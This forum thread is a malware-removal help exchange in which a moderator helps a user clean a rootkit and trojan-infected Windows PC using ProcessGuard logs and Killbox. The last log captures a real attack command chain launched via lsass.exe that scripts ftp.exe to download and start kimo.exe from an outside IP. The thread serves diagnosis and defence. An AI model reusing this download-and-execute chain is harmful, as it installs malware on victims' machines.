
help i have trojan horse collected.5.L [RESOLVED]


  • This topic is locked

#91
duglartis

    Member

  • Topic Starter
  • Member
  • 159 posts
Hello again. Just before I download this new programme, I still have the AVG virus warning popping up every minute with the trojan horse collected message.
Does this matter?
Thanks for your help.
  • 0


#92
Metallica

    Spyware Veteran

  • GeekU Moderator
  • 33,101 posts
If you use ProcessGuard wisely it will put an end to that.

As I told you before, there is only one way to be sure the computer is clean (format).

What I will try to do now is put you in charge of the computer again instead of the rootkit.

Regards,
  • 0

#93
duglartis

    Member

  • Topic Starter
  • Member
  • 159 posts
Hello again.
I am reluctant to purchase online while my system is still infected. Here is a log file from PG:
Process Guard Log Started---
Tue 02 - 20:00:55 [EXECUTION] "c:\windows\system32\tcpsvcs.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\services.exe" [480]
[EXECUTION] Commandline - [ c:\windows\system32\tcpsvcs.exe ]
Tue 02 - 20:00:55 [EXECUTION] "c:\windows\system32\rundll32.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\nvsvc32.exe" [1344]
[EXECUTION] Commandline - [ rundll32.exe nvcpl.dll,resetview ]
Tue 02 - 20:00:55 [EXECUTION] "c:\windows\system32\svchost.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\services.exe" [480]
[EXECUTION] Commandline - [ c:\windows\system32\svchost.exe -k imgsvc ]
Tue 02 - 20:00:58 [EXECUTION] "c:\windows\system32\spool\drivers\w32x86\3\hpztsb07.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1012]
[EXECUTION] Commandline - [ "c:\windows\system32\spool\drivers\w32x86\3\hpztsb07.exe" ]
Tue 02 - 20:01:00 [EXECUTION] "c:\program files\roxio\easy cd creator 5\directcd\directcd.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1012]
[EXECUTION] Commandline - [ "c:\program files\roxio\easy cd creator 5\directcd\directcd.exe" ]
Tue 02 - 20:01:00 [EXECUTION] "c:\windows\system32\nerocheck.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1012]
[EXECUTION] Commandline - [ "c:\windows\system32\nerocheck.exe" ]
Tue 02 - 20:01:00 [EXECUTION] "c:\windows\system32\rundll32.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1012]
[EXECUTION] Commandline - [ "c:\windows\system32\rundll32.exe" c:\windows\system32\nvcpl.dll,nvstartup ]
Tue 02 - 20:01:00 [EXECUTION] "c:\windows\system32\dumprep.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1012]
[EXECUTION] Commandline - [ "c:\windows\system32\dumprep.exe" 0 -k ]
Tue 02 - 20:01:01 [EXECUTION] "c:\program files\quicktime\qttask.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1012]
[EXECUTION] Commandline - [ "c:\program files\quicktime\qttask.exe" -atboottime ]
Tue 02 - 20:01:01 [EXECUTION] "c:\windows\system32\dumprep.exe" was allowed to run
[EXECUTION] Started by "Unknown Process" [2004]
[EXECUTION] Commandline - [ c:\windows\system32\dumprep.exe 0 -kg ]
Tue 02 - 20:01:01 [EXECUTION] "c:\progra~1\grisoft\avgfre~1\avgcc.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1012]
[EXECUTION] Commandline - [ "c:\progra~1\grisoft\avgfre~1\avgcc.exe" /startup ]
Tue 02 - 20:01:01 [EXECUTION] "c:\progra~1\grisoft\avgfre~1\avgemc.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1012]
[EXECUTION] Commandline - [ "c:\progra~1\grisoft\avgfre~1\avgemc.exe" ]
Tue 02 - 20:01:01 [EXECUTION] "c:\documents and settings\dug and tania\my documents\downloads\regprot.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1012]
[EXECUTION] Commandline - [ "c:\documents and settings\dug and tania\my documents\downloads\regprot.exe" /start ]
Tue 02 - 20:01:02 [EXECUTION] "c:\windows\system32\nwiz.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1012]
[EXECUTION] Commandline - [ "c:\windows\system32\nwiz.exe" /install ]
Tue 02 - 20:01:03 [EXECUTION] "c:\windows\system32\imapi.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\services.exe" [480]
[EXECUTION] Commandline - [ c:\windows\system32\imapi.exe ]
Tue 02 - 20:01:03 [EXECUTION] "c:\program files\processguard\pgaccount.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1012]
[EXECUTION] Commandline - [ "c:\program files\processguard\pgaccount.exe" ]
Tue 02 - 20:01:03 [EXECUTION] "c:\windows\system32\rundll32.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1012]
[EXECUTION] Commandline - [ "c:\windows\system32\rundll32.exe" nview.dll,nviewloadhook ]
Tue 02 - 20:01:03 [EXECUTION] "c:\windows\system32\rundll32.exe" was allowed to run
[EXECUTION] Started by "Unknown Process" [608]
[EXECUTION] Commandline - [ rundll32 nview.dll,nviewinitialize ]
Tue 02 - 20:01:04 [EXECUTION] "c:\program files\processguard\procguard.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1012]
[EXECUTION] Commandline - [ "c:\program files\processguard\procguard.exe" -minimize ]
Tue 02 - 20:01:04 [EXECUTION] "c:\program files\microsoft office\office\osa9.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1012]
[EXECUTION] Commandline - [ "c:\program files\microsoft office\office\osa9.exe" -b -l ]
Tue 02 - 20:01:41 [EXECUTION] "c:\windows\system32\wuauclt.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\svchost.exe" [676]
[EXECUTION] Commandline - [ "c:\windows\system32\wuauclt.exe" /runstoreascomserver local\[2a4]susds339aad490a6f574fb273dc16f51a9cd9 ]
Tue 02 - 20:01:42 [EXECUTION] "c:\windows\system32\wuauclt.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\svchost.exe" [676]
[EXECUTION] Commandline - [ "c:\windows\system32\wuauclt.exe" /runstoreascomserver local\[2a4]susdsf947b6beb664174db9cf14e356862d2e ]
Tue 02 - 20:01:43 [EXECUTION] "c:\windows\system32\wuauclt.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\svchost.exe" [676]
[EXECUTION] Commandline - [ "c:\windows\system32\wuauclt.exe" /runstoreascomserver local\[2a4]susdsa657b0e76eab7c42830993899cea1b13 ]
Tue 02 - 20:01:43 [EXECUTION] "c:\windows\system32\wuauclt.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\svchost.exe" [676]
[EXECUTION] Commandline - [ "c:\windows\system32\wuauclt.exe" /runstoreascomserver local\[2a4]susdsc501c0215fc1c54890ffb847a83913e6 ]
Tue 02 - 20:14:49 [EXECUTION] "c:\program files\internet explorer\iexplore.exe" was allowed to run
[EXECUTION] Started by "c:\program files\processguard\procguard.exe" [700]
[EXECUTION] Commandline - [ "c:\program files\internet explorer\iexplore.exe" -nohome ]
Tue 02 - 20:15:10 [EXECUTION] "c:\windows\system32\notepad.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1012]
[EXECUTION] Commandline - [ c:\windows\system32\notepad.exe c:\program files\processguard\logs\pglog_08_2005.txt ]
Tue 02 - 20:17:17 [EXECUTION] "c:\program files\mozilla firefox\firefox.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1012]
[EXECUTION] Commandline - [ "c:\program files\mozilla firefox\firefox.exe" ]
Tue 02 - 20:23:30 [EXECUTION] "c:\windows\system32\cmd.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\lsass.exe" [492]
[EXECUTION] Commandline - [ cmd ]
Tue 02 - 20:23:31 [EXECUTION] "c:\windows\system32\ftp.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\cmd.exe" [3320]
[EXECUTION] Commandline - [ ftp.exe -n -s:msw.dll ]
Tue 02 - 20:24:05 [EXECUTION] "c:\windows\system32\msua.exe" was allowed to run
[EXECUTION] Started by "Unknown Process" [3320]
[EXECUTION] Commandline - [ msua.exe ]
Tue 02 - 20:24:05 [EXECUTION] "c:\windows\system32\mwupdate32.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\msua.exe" [3420]
[EXECUTION] Commandline - [ c:\windows\system32\mwupdate32.exe 1804 "c:\windows\system32\msua.exe" ]
Tue 02 - 20:25:34 [EXECUTION] "c:\windows\system32\svchost.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\services.exe" [480]
[EXECUTION] Commandline - [ c:\windows\system32\svchost.exe -k netsvcs ]
Tue 02 - 20:30:48 [EXECUTION] "c:\windows\system32\logonui.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\winlogon.exe" [436]
[EXECUTION] Commandline - [ logonui.exe /status /shutdown ]
Tue 02 - 20:30:59 [TERMINATE] c:\windows\system32\services.exe [480] was blocked from terminating c:\windows\system32\spoolsv.exe [1072]

---Process Guard Log Started---
Tue 02 - 20:31:49 [EXECUTION] "c:\windows\system32\tcpsvcs.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\services.exe" [480]
[EXECUTION] Commandline - [ c:\windows\system32\tcpsvcs.exe ]
Tue 02 - 20:31:49 [EXECUTION] "c:\windows\system32\rundll32.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\nvsvc32.exe" [1336]
[EXECUTION] Commandline - [ rundll32.exe nvcpl.dll,resetview ]
Tue 02 - 20:31:50 [EXECUTION] "c:\windows\system32\svchost.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\services.exe" [480]
[EXECUTION] Commandline - [ c:\windows\system32\svchost.exe -k imgsvc ]
Tue 02 - 20:31:55 [EXECUTION] "c:\windows\system32\spool\drivers\w32x86\3\hpztsb07.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1012]
[EXECUTION] Commandline - [ "c:\windows\system32\spool\drivers\w32x86\3\hpztsb07.exe" ]
Tue 02 - 20:31:55 [EXECUTION] "c:\program files\roxio\easy cd creator 5\directcd\directcd.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1012]
[EXECUTION] Commandline - [ "c:\program files\roxio\easy cd creator 5\directcd\directcd.exe" ]
Tue 02 - 20:31:55 [EXECUTION] "c:\windows\system32\nerocheck.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1012]
[EXECUTION] Commandline - [ "c:\windows\system32\nerocheck.exe" ]
Tue 02 - 20:31:55 [EXECUTION] "c:\windows\system32\rundll32.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1012]
[EXECUTION] Commandline - [ "c:\windows\system32\rundll32.exe" c:\windows\system32\nvcpl.dll,nvstartup ]
Tue 02 - 20:31:55 [EXECUTION] "c:\windows\system32\dumprep.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1012]
[EXECUTION] Commandline - [ "c:\windows\system32\dumprep.exe" 0 -k ]
Tue 02 - 20:31:55 [EXECUTION] "c:\program files\quicktime\qttask.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1012]
[EXECUTION] Commandline - [ "c:\program files\quicktime\qttask.exe" -atboottime ]
Tue 02 - 20:31:56 [EXECUTION] "c:\windows\system32\dumprep.exe" was allowed to run
[EXECUTION] Started by "Unknown Process" [1992]
[EXECUTION] Commandline - [ c:\windows\system32\dumprep.exe 0 -kg ]
Tue 02 - 20:31:56 [EXECUTION] "c:\program files\grisoft\avg free\avgcc.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1012]
[EXECUTION] Commandline - [ "c:\progra~1\grisoft\avgfre~1\avgcc.exe" /startup ]
Tue 02 - 20:31:56 [EXECUTION] "c:\program files\grisoft\avg free\avgemc.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1012]
[EXECUTION] Commandline - [ "c:\progra~1\grisoft\avgfre~1\avgemc.exe" ]
Tue 02 - 20:31:56 [EXECUTION] "c:\documents and settings\dug and tania\my documents\downloads\regprot.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1012]
[EXECUTION] Commandline - [ "c:\documents and settings\dug and tania\my documents\downloads\regprot.exe" /start ]
Tue 02 - 20:31:56 [EXECUTION] "c:\windows\system32\nwiz.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1012]
[EXECUTION] Commandline - [ "c:\windows\system32\nwiz.exe" /install ]
Tue 02 - 20:31:57 [EXECUTION] "c:\program files\processguard\pgaccount.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1012]
[EXECUTION] Commandline - [ "c:\program files\processguard\pgaccount.exe" ]
Tue 02 - 20:31:57 [EXECUTION] "c:\windows\system32\rundll32.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1012]
[EXECUTION] Commandline - [ "c:\windows\system32\rundll32.exe" nview.dll,nviewloadhook ]
Tue 02 - 20:31:57 [EXECUTION] "c:\windows\system32\rundll32.exe" was allowed to run
[EXECUTION] Started by "Unknown Process" [232]
[EXECUTION] Commandline - [ rundll32 nview.dll,nviewinitialize ]
Tue 02 - 20:31:58 [EXECUTION] "c:\program files\processguard\procguard.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1012]
[EXECUTION] Commandline - [ "c:\program files\processguard\procguard.exe" -minimize ]
Tue 02 - 20:31:58 [EXECUTION] "c:\program files\microsoft office\office\osa9.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1012]
[EXECUTION] Commandline - [ "c:\program files\microsoft office\office\osa9.exe" -b -l ]
Tue 02 - 20:31:59 [EXECUTION] "c:\windows\system32\imapi.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\services.exe" [480]
[EXECUTION] Commandline - [ c:\windows\system32\imapi.exe ]
Tue 02 - 20:32:38 [EXECUTION] "c:\windows\system32\wuauclt.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\svchost.exe" [676]
[EXECUTION] Commandline - [ "c:\windows\system32\wuauclt.exe" /runstoreascomserver local\[2a4]susds4f2296671bff804fa63b64010823e2c2 ]
Tue 02 - 20:32:39 [EXECUTION] "c:\windows\system32\wuauclt.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\svchost.exe" [676]
[EXECUTION] Commandline - [ "c:\windows\system32\wuauclt.exe" /runstoreascomserver local\[2a4]susdsb967dced95f59c4d9b71494fea294357 ]
Tue 02 - 20:32:40 [EXECUTION] "c:\windows\system32\wuauclt.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\svchost.exe" [676]
[EXECUTION] Commandline - [ "c:\windows\system32\wuauclt.exe" /runstoreascomserver local\[2a4]susds0d7ee5485534404d82ad420d64a146b7 ]
Tue 02 - 20:32:41 [EXECUTION] "c:\windows\system32\wuauclt.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\svchost.exe" [676]
[EXECUTION] Commandline - [ "c:\windows\system32\wuauclt.exe" /runstoreascomserver local\[2a4]susdsab2a85c93f2acb4488b569f4312eb1be ]
Tue 02 - 20:34:06 [EXECUTION] "c:\program files\mozilla firefox\firefox.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1012]
[EXECUTION] Commandline - [ "c:\program files\mozilla firefox\firefox.exe" ]
Tue 02 - 20:34:49 [EXECUTION] "c:\program files\internet explorer\iexplore.exe" was allowed to run
[EXECUTION] Started by "c:\program files\processguard\procguard.exe" [376]
[EXECUTION] Commandline - [ "c:\program files\internet explorer\iexplore.exe" -nohome ]
Tue 02 - 20:35:52 [EXECUTION] "c:\windows\system32\notepad.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1012]
[EXECUTION] Commandline - [ c:\windows\system32\notepad.exe c:\program files\processguard\logs\pglog_08_2005.txt ]
Thanks for your help.
  • 0

#94
Metallica

    Spyware Veteran

  • GeekU Moderator
  • 33,101 posts
Bingo :tazz:

You posted exactly the pieces with the info I needed.

In ProcessGuard, uncheck the learning mode option (if still enabled) and remove the permission for c:\windows\system32\ftp.exe.

* Then run Killbox by double-clicking Killbox.exe.
* In the Killbox program, select the Delete on Reboot option.
* Open the text file with these instructions in it, and copy the file names below to the clipboard by highlighting them and pressing Control-C:
c:\windows\system32\mwupdate32.exe
c:\windows\system32\msua.exe

* Return to Killbox, go to the File menu, and choose "Paste from Clipboard".
* Click the red-and-white "Delete File" button. Click "Yes" at the Delete on Reboot prompt. Click "No" at the Pending Operations prompt.

Let the computer reboot and find the file:
msw.dll (probably also in c:\windows\system32)

Have that file and c:\windows\system32\ftp.exe scanned at:
http://virusscan.jotti.org/

Post the results of that scan please.

Regards,
  • 0

#95
duglartis

    Member

  • Topic Starter
  • Member
  • 159 posts
Hello again. Couldn't find msw.dll, but did find 2 copies of ftp.exe; one was in the dll file.
Here are the scan results:
ftp.exe
Status: OK
MD5 358f2b1b49483485ce95d68739237ad4
Packers detected: -
Scanner results:
AntiVir - Found nothing
ArcaVir - Found nothing
Avast - Found nothing
AVG Antivirus - Found nothing
BitDefender - Found nothing
ClamAV - Found nothing
Dr.Web - Found nothing
F-Prot Antivirus - Found nothing
Fortinet - Found nothing
Kaspersky Anti-Virus - Found nothing
NOD32 - Found nothing
Norman Virus Control - Found nothing
UNA - Found nothing
VBA32 - Found nothing
Thanks for your help.
  • 0

#96
Metallica

    Spyware Veteran

  • GeekU Moderator
  • 33,101 posts
Can you try this for me?
(Assuming you did delete the other two files and are still using ProcessGuard to block the unknown.)

ftp.exe is the real file, but it is being abused to perform tasks encoded in msw.dll.

* Run Killbox again and use Standard File Kill.
* Copy & paste this into the Full Path for File to Delete box:

c:\windows\system32\msw.dll

* Click the red-and-white "Delete File" button.

If this was successful, a folder C:\!Submit will be created with subfolders named after the date and a copy of the deleted file inside.

Let me know if it is.

Also let me know if the alarms by AVG have stopped after you deleted the other two files.

Regards,
  • 0

#97
duglartis

    Member

  • Topic Starter
  • Member
  • 159 posts
Hello.
Killbox said the file c:\windows\system32\msw.dll does not exist. Also still getting AVG popups after deleting the last 2 files. Also had the ftp programme try to run while typing this, so I did not allow it through PG.
Thanks for your patience.
  • 0

#98
Metallica

    Spyware Veteran

  • GeekU Moderator
  • 33,101 posts
Can you post some ProcessGuard logs from the next time AVG sounds the alarm?

I'd like to have another look and see if we can figure out what triggers these infections.

Regards,
  • 0

#99
duglartis

    Member

  • Topic Starter
  • Member
  • 159 posts
Log file for today:
---Process Guard Log Started---
Thu 04 - 17:46:21 [EXECUTION] "c:\windows\system32\tcpsvcs.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\services.exe" [476]
[EXECUTION] Commandline - [ c:\windows\system32\tcpsvcs.exe ]
Thu 04 - 17:46:21 [EXECUTION] "c:\windows\system32\rundll32.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\nvsvc32.exe" [1332]
[EXECUTION] Commandline - [ rundll32.exe nvcpl.dll,resetview ]
Thu 04 - 17:46:22 [EXECUTION] "c:\windows\system32\svchost.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\services.exe" [476]
[EXECUTION] Commandline - [ c:\windows\system32\svchost.exe -k imgsvc ]
Thu 04 - 17:46:22 [EXECUTION] "c:\program files\grisoft\avg free\avginet.exe" was allowed to run
[EXECUTION] Started by "c:\progra~1\grisoft\avgfre~1\avgamsvr.exe" [1204]
[EXECUTION] Commandline - [ "c:\progra~1\grisoft\avgfre~1\avginet.exe" /sched=5 ]
Thu 04 - 17:46:26 [EXECUTION] "c:\windows\system32\spool\drivers\w32x86\3\hpztsb07.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1016]
[EXECUTION] Commandline - [ "c:\windows\system32\spool\drivers\w32x86\3\hpztsb07.exe" ]
Thu 04 - 17:46:26 [EXECUTION] "c:\program files\roxio\easy cd creator 5\directcd\directcd.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1016]
[EXECUTION] Commandline - [ "c:\program files\roxio\easy cd creator 5\directcd\directcd.exe" ]
Thu 04 - 17:46:27 [EXECUTION] "c:\windows\system32\nerocheck.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1016]
[EXECUTION] Commandline - [ "c:\windows\system32\nerocheck.exe" ]
Thu 04 - 17:46:27 [EXECUTION] "c:\windows\system32\rundll32.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1016]
[EXECUTION] Commandline - [ "c:\windows\system32\rundll32.exe" c:\windows\system32\nvcpl.dll,nvstartup ]
Thu 04 - 17:46:27 [EXECUTION] "c:\windows\system32\dumprep.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1016]
[EXECUTION] Commandline - [ "c:\windows\system32\dumprep.exe" 0 -k ]
Thu 04 - 17:46:27 [EXECUTION] "c:\program files\quicktime\qttask.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1016]
[EXECUTION] Commandline - [ "c:\program files\quicktime\qttask.exe" -atboottime ]
Thu 04 - 17:46:27 [EXECUTION] "c:\windows\system32\dumprep.exe" was allowed to run
[EXECUTION] Started by "Unknown Process" [2020]
[EXECUTION] Commandline - [ c:\windows\system32\dumprep.exe 0 -kg ]
Thu 04 - 17:46:27 [EXECUTION] "c:\program files\grisoft\avg free\avgcc.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1016]
[EXECUTION] Commandline - [ "c:\progra~1\grisoft\avgfre~1\avgcc.exe" /startup ]
Thu 04 - 17:46:28 [EXECUTION] "c:\program files\grisoft\avg free\avgemc.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1016]
[EXECUTION] Commandline - [ "c:\progra~1\grisoft\avgfre~1\avgemc.exe" ]
Thu 04 - 17:46:28 [EXECUTION] "c:\documents and settings\dug and tania\my documents\downloads\regprot.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1016]
[EXECUTION] Commandline - [ "c:\documents and settings\dug and tania\my documents\downloads\regprot.exe" /start ]
Thu 04 - 17:46:29 [EXECUTION] "c:\windows\system32\nwiz.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1016]
[EXECUTION] Commandline - [ "c:\windows\system32\nwiz.exe" /install ]
Thu 04 - 17:46:29 [EXECUTION] "c:\program files\processguard\pgaccount.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1016]
[EXECUTION] Commandline - [ "c:\program files\processguard\pgaccount.exe" ]
Thu 04 - 17:46:30 [EXECUTION] "c:\windows\system32\imapi.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\services.exe" [476]
[EXECUTION] Commandline - [ c:\windows\system32\imapi.exe ]
Thu 04 - 17:46:30 [EXECUTION] "c:\windows\system32\rundll32.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1016]
[EXECUTION] Commandline - [ "c:\windows\system32\rundll32.exe" nview.dll,nviewloadhook ]
Thu 04 - 17:46:31 [EXECUTION] "c:\program files\processguard\procguard.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1016]
[EXECUTION] Commandline - [ "c:\program files\processguard\procguard.exe" -minimize ]
Thu 04 - 17:46:31 [EXECUTION] "c:\windows\system32\rundll32.exe" was allowed to run
[EXECUTION] Started by "Unknown Process" [452]
[EXECUTION] Commandline - [ rundll32 nview.dll,nviewinitialize ]
Thu 04 - 17:46:31 [EXECUTION] "c:\program files\microsoft office\office\osa9.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1016]
[EXECUTION] Commandline - [ "c:\program files\microsoft office\office\osa9.exe" -b -l ]
Thu 04 - 17:47:09 [EXECUTION] "c:\windows\system32\wuauclt.exe" was blocked from running
[EXECUTION] Started by "c:\windows\system32\svchost.exe" [676]
[EXECUTION] Commandline - [ "c:\windows\system32\wuauclt.exe" /runstoreascomserver local\[2a4]susds5ceb59ee3dfb9e449890ecd430cfefc5 ]
Thu 04 - 17:47:09 [EXECUTION] "c:\windows\system32\wuauclt.exe" was blocked from running
[EXECUTION] Started by "c:\windows\system32\svchost.exe" [676]
[EXECUTION] Commandline - [ "c:\windows\system32\wuauclt.exe" /runstoreascomserver local\[2a4]susdsf99d48a949d1794aab3ebe4ca59bc6f1 ]
Thu 04 - 17:47:09 [EXECUTION] "c:\windows\system32\wuauclt.exe" was blocked from running
[EXECUTION] Started by "c:\windows\system32\svchost.exe" [676]
[EXECUTION] Commandline - [ "c:\windows\system32\wuauclt.exe" /runstoreascomserver local\[2a4]susds7795f4279bf4ca46a9081197841552e3 ]
Thu 04 - 17:47:09 [EXECUTION] "c:\windows\system32\wuauclt.exe" was blocked from running
[EXECUTION] Started by "c:\windows\system32\svchost.exe" [676]
[EXECUTION] Commandline - [ "c:\windows\system32\wuauclt.exe" /runstoreascomserver local\[2a4]susdsda5087beca8394488d3e4423ff18d8f2 ]
Thu 04 - 17:48:45 [EXECUTION] "c:\program files\mozilla firefox\firefox.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1016]
[EXECUTION] Commandline - [ "c:\program files\mozilla firefox\firefox.exe" ]
Thu 04 - 17:49:02 [EXECUTION] "c:\documents and settings\dug and tania\desktop\killbox.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1016]
[EXECUTION] Commandline - [ "c:\documents and settings\dug and tania\desktop\killbox.exe" ]
Thu 04 - 17:50:34 [EXECUTION] "c:\windows\system32\cmd.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\lsass.exe" [488]
[EXECUTION] Commandline - [ cmd ]
Thu 04 - 17:50:45 [EXECUTION] "c:\windows\system32\ftp.exe" was blocked from running
[EXECUTION] Started by "c:\windows\system32\cmd.exe" [1708]
[EXECUTION] Commandline - [ ftp.exe -n -s:cdtime.asp ]
Thu 04 - 17:50:45 [EXECUTION] "c:\windows\system32\cmd.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\lsass.exe" [488]
[EXECUTION] Commandline - [ cmd /c echo open 205.177.75.19 58739 >cdtime.asp &cmd /c echo user wh0re got[bleep]ed >>cdtime.asp &cmd /c echo binary >>cdtime.asp &cmd /c echo get kimo.exe >>cdtime.asp &cmd /c echo bye >>cdtime.asp &cmd /c ftp.exe -n -s:cdtime.asp &cmd /c del cdtime.asp &start kimo.exe
]
Thu 04 - 17:50:45 [EXECUTION] "c:\windows\system32\cmd.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\cmd.exe" [1484]
[EXECUTION] Commandline - [ cmd /c echo user wh0re got[bleep]ed ]
Thu 04 - 17:50:45 [EXECUTION] "c:\windows\system32\cmd.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\cmd.exe" [1484]
[EXECUTION] Commandline - [ cmd /c echo binary ]
Thu 04 - 17:50:45 [EXECUTION] "c:\windows\system32\cmd.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\cmd.exe" [1484]
[EXECUTION] Commandline - [ cmd /c echo get kimo.exe ]
Thu 04 - 17:50:45 [EXECUTION] "c:\windows\system32\cmd.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\cmd.exe" [1484]
[EXECUTION] Commandline - [ cmd /c echo bye ]
Thu 04 - 17:50:46 [EXECUTION] "c:\windows\system32\cmd.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\cmd.exe" [1484]
[EXECUTION] Commandline - [ cmd /c ftp.exe -n -s:cdtime.asp ]
Thu 04 - 17:50:48 [EXECUTION] "c:\windows\system32\ftp.exe" was blocked from running
[EXECUTION] Started by "Unknown Process" [1844]
[EXECUTION] Commandline - [ ftp.exe -n -s:cdtime.asp ]
Thu 04 - 17:50:48 [EXECUTION] "c:\windows\system32\cmd.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\cmd.exe" [1484]
[EXECUTION] Commandline - [ cmd /c del cdtime.asp ]
Thu 04 - 19:00:51 [EXECUTION] "c:\windows\system32\defrag.exe" was blocked from running
[EXECUTION] Started by "c:\windows\system32\svchost.exe" [676]
[EXECUTION] Commandline - [ "c:\windows\system32\defrag.exe" -p 2a4 -s 000013d4 -b c: ]
Thu 04 - 19:00:52 [EXECUTION] "c:\windows\system32\wuauclt.exe" was blocked from running
[EXECUTION] Started by "c:\windows\system32\svchost.exe" [676]
[EXECUTION] Commandline - [ "c:\windows\system32\wuauclt.exe" /runstoreascomserver local\[2a4]susdsff9590f5c1608e44bf9ad392550e60d0 ]
Thu 04 - 19:00:52 [EXECUTION] "c:\windows\system32\wuauclt.exe" was blocked from running
[EXECUTION] Started by "c:\windows\system32\svchost.exe" [676]
[EXECUTION] Commandline - [ "c:\windows\system32\wuauclt.exe" /runstoreascomserver local\[2a4]susdsaf71e58616f3534196e4c1642b9d4509 ]
Thu 04 - 19:01:29 [EXECUTION] "c:\program files\mozilla firefox\firefox.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1016]
[EXECUTION] Commandline - [ "c:\program files\mozilla firefox\firefox.exe" ]
Thu 04 - 19:13:25 [EXECUTION] "c:\windows\system32\notepad.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1016]
[EXECUTION] Commandline - [ c:\windows\system32\notepad.exe c:\program files\processguard\logs\pglog_08_2005.txt ]
  • 0
